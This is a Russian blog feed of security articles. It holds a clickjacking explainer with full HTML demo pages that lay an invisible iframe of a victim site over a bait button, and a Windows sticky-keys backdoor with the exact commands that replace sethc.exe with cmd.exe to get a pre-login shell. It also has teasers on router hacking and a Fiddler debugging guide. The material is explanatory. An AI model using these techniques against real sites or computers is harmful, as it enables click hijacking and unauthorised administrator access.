Все ленты — последние статьи

Атака Clickjacking и защита от неё

Атака Clickjacking и защита от неё

Атака «кликджекинг» (англ. Clickjacking) позволяет хакеру выполнить клик на сайте-жертве от имени
посетителя.
В русском языке встречается дословный перевод термина clickjacking: «угон клика». Так же
применительно к clickjacking-атаке можно встретить термины «перекрытие iframe» и «подмена
пользовательского интерфейса».
Кликджекингу подверглись в своё время Twitter, Facebook , PayPal, YouTube и многие другие сайты.
Сейчас, конечно, они уже защищены.
В целом идея очень проста.

Вот как выглядел «угон клика» пользователя, который зарегистрирован на Facebook:
1. На вредоносной странице пользователю подсовывается безобидная ссылка (скажем, что-то
скачать, «разбогатеть сейчас», посмотреть ролик или просто перейти по ссылке на интересный
ресурс).
2. Поверх этой заманчивой ссылки помещен прозрачный iframe со страницей facebook.com, так что
кнопка «Like» находится чётко над ней.
3. Кликая на ссылку, посетитель на самом деле нажимает на эту кнопку.

Видимый код

 

<!doctype html>
<html>

<head>
  <meta charset="UTF-8">
</head>

<body>

  <style>
    iframe {
      /* iframe с сайта-жертвы */

      width: 400px;
      height: 100px;
      position: absolute;
      top: 0;
      left: -20px;
      opacity: 0.5;
      z-index: 1;
    }
  </style>

  <div>Нажмите, чтобы разбогатеть сейчас:</div>

  <!-- URL, в реальности — с другого домена (атакуемого сайта) -->
  <iframe src="/facebook.html"></iframe>

  <button>Жми тут!</button>

  <div>..И всё получится (хе-хе, у меня, злого хакера, получится)!</div>

</body>

</html>

 

Невидимая кнопка(как у хакера)

<!doctype html>
<html>

<head>
  <meta charset="UTF-8">
</head>

<body>

  <style>
    iframe {
      /* iframe с сайта-жертвы */

      width: 400px;
      height: 100px;
      position: absolute;
      top: 0;
      left: -20px;
      opacity: 0;
      z-index: 1;
    }
  </style>

  <div>Нажмите, чтобы разбогатеть сейчас:</div>

  <!-- URL, в реальности — с другого домена (атакуемого сайта) -->
  <iframe src="/facebook.html"></iframe>

  <button>Жми тут!</button>

  <div>..И всё получится (хе-хе, у меня, злого хакера, получится)!</div>

</body>

</html>

 

 

чему могут привести уязвимости в роутерах TP-LINK

 

На самом деле речь в данной статье пойдет не только об уязвимостях в роутерах TP-LINK, но и о том, как можно удаленно сделать из таких роутеров хак-станцию и чего можно при помощи этого достичь. А так же немного о том, как это было применено для получения доступа к странице ВКонтакте. Это своего рода история одного большого взлома, которая включает в себя все выше перечисленное.

Подробнее: чему могут привести уязвимости в роутерах TP-LINK

Fiddler — помощник в отладке JavaScript

http://habrahabr.ru/post/140147/

    What is Fiddler?
    Fiddler is a Web Debugging Proxy which logs all HTTP(S) traffic between your computer and the Internet. Fiddler allows you to inspect traffic, set breakpoints, and «fiddle» with incoming or outgoing data. Fiddler includes a powerful event-based scripting subsystem, and can be extended using any .NET language.

    Fiddler is freeware and can debug traffic from virtually any application that supports a proxy, including Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox, Opera, and thousands more. You can also debug traffic from popular devices like Windows Phone, iPod/iPad, and others.

    To debug applications you've written in Java, .NET, or using WinHTTP, see this page.

Итак Fiddler — прокси, который работает с трафиком между вашим компьютером и удаленным сервером, и позволяет просматривать и менять его.


— применение первое:
Собственно раз уж это прокси — то мы можем увидеть все запросы их заголовки, cookie, параметры передаваемые на сервер.
Когда-то, мне довольно часто задавали вопрос back-end разработчики — чем можно посмотреть параметры передаваемые на сервер при отправке формы. Тогда я через консоль firebug довешивал onsubmit на форму, делал serialize и посылал при необходимости форму аяксом. Теперь зная про фидлер — можно не городить костыли.
Кроме того нажав F11 можем отлаживать запросы — добавляя нужные параметры перед посылкой на сервер и подставляя другие ответы от сервера.


— замена расширения для FF:
Есть замечательное расширение в ФФ для тестирования сайта на медленном соединении (название которого я всегда забываю). Кроме того «у него» есть маленький недостаток — я не могу проверить сайт в других браузерах кроме ФФ.
На помощь спешит:


— autoResponder+ firebug
То чем я пользуюсь чаще всего и то чем хотелось поделиться больше всего.
Ситуация — у вас есть ссылка на живой сайт в котором нужно дописать/исправить/отлаживать скрипт.

— Знакомая ситуация?

Что делать? Шеф все пропало, я не могу работать в таких условиях!

Спокойно!
Делай раз:

Сохраняем скрипт у себя на машине. И открываем в редакторе.

Делай два: приводим код к читабельному виду, к примеру с помощью этого сервиса, и сохраняем полученное заменяя обфусцированный код.

Делай три:
— создаем правило в AutoResponder. Теперь если мы обновим в браузере нашу страницу, при этом скрипт который мы отлаживали будет иметь удобоваримый вид —

Теперь каждый раз когда вы обновляете страницу пока вам будет подменяться и отдаваться ваш локальный файл. Нет необходимости сохранять страницу на машину чтобы добавить или отладить функциональность.

P.S. По мотивам этой статьи я узнал про параметр передаваемый в HTTP заголовке "X-Requested-With XMLHttpRequest", который действительно присутствует и виден среди заголовков запроса в Фидлере, а по мотивам этого вопроса на stackoverflow, мы теперь знаем как от этого избавиться. Фух, мои JavaScript-боты для онлайн игр в безопасности ;)

P.P.S Альтернатива для Фидлера на linux — плагин для ФФ — Live HTTP Headers — впрочем не столь удобен.
еще варианты , но к сожалению пока не было возможности проверить функционал из предложенных приложений.

Ссылки почитать:
Обзор бесплатных инструментов для пентеста web-ресурсов и не только v2
Видео по пользованию Feddler (анг.) — видео довольно старое, если судить по интерфейсу.
инструменты HTTP-Отладки от И. Кантора
презентация по Fiddler
Fiddler FAQ на stackoverflow

UPD:

MSDN — Fiddler PowerToy — Part 1: HTTP Debugging
MSDN — Fiddler PowerToy — Part 2: HTTP Performance

14 гаджетов для взломщика

http://xakep.ru/14-hacker-gadget/ источник +фото

14 гаджетов для взломщика

Необычные виды устройств и гаджетов есть не только у сотрудников спецслужб и агентов 007. Немало девайсов были специально разработаны для нужд хакеров и исследователей безопасности. Что они собой представляют? Мы решили собрать настоящий хакерский чемоданчик.
Зачем это нужно?

Все, кто серьезно занимается пентестом или хакингом, наверняка хоть раз оказывались в условиях, когда для успешного проведения атаки не хватало буквально одного шага. В книге Кевина Митника «Искусство вторжения» (The Art of Intrusion) подробно описана история одного пентеста, в котором препятствие для проверяющих представлял грамотно настроенный системным администратором файрвол. Казалось бы, во внутреннюю сеть компании проникнуть нет шанса. Но один из членов команды обнаружил в приемной рабочий разъем для подсоединения к сети и незаметно подключил к нему миниатюрное устройство для беспроводного доступа (на которое никто так и не обратил внимания до окончания тестирования). Таким образом команда пентестеров получила прямой доступ к внутренней сети компании через Wi-Fi. Это один из многих примеров, иллюстрирующих, что недооценивать хак-девайсы не стоит. Именно поэтому мы сегодня рассмотрим наиболее интересные варианты, которые можно приобрести в Сети.

Подробнее: 14 гаджетов для взломщика

Простой метод восстановления забытого пароля в Windows 7

В хакерском сообществе пользуется популярностью метод эскалации привилегий в Windows 7, Windows 8 и Windows Server 2008 R2 путём вызова системного шелла перед авторизацией в Windows.

Метод очень простой: нужно предварительно заменить в системе файл sethc.exe на файл cmd.exe.
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Тогда при пятикратном нажатии Shift перед авторизацией в Windows запускается системная оболочка, в которой можно спокойно выполнять любые команды. Данный метод может быть полезен злоумышленнику, который получил физический доступ к чужому компьютеру и хочет поработать с правами администратора.

Как вариант, способ можно использовать для смены забытого пароля в системе Windows 7. Заменить файлы в системе можно без авторизации в Windows, если примонтировать диск c Windows к Linux-системе.
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Функция залипания клавиш (Sticky Keys) предназначена для пользователей, которым трудно нажимать две клавиши одновременно. Для активации этой функции нужно пять раз нажать Shift, тогда запускается соответствующий файл sethc.exe. Это действует даже до того, как пользователь ввёл пароль в Windows. Если заменить этот файл на cmd.exe, то запустится шелл с правами администратора.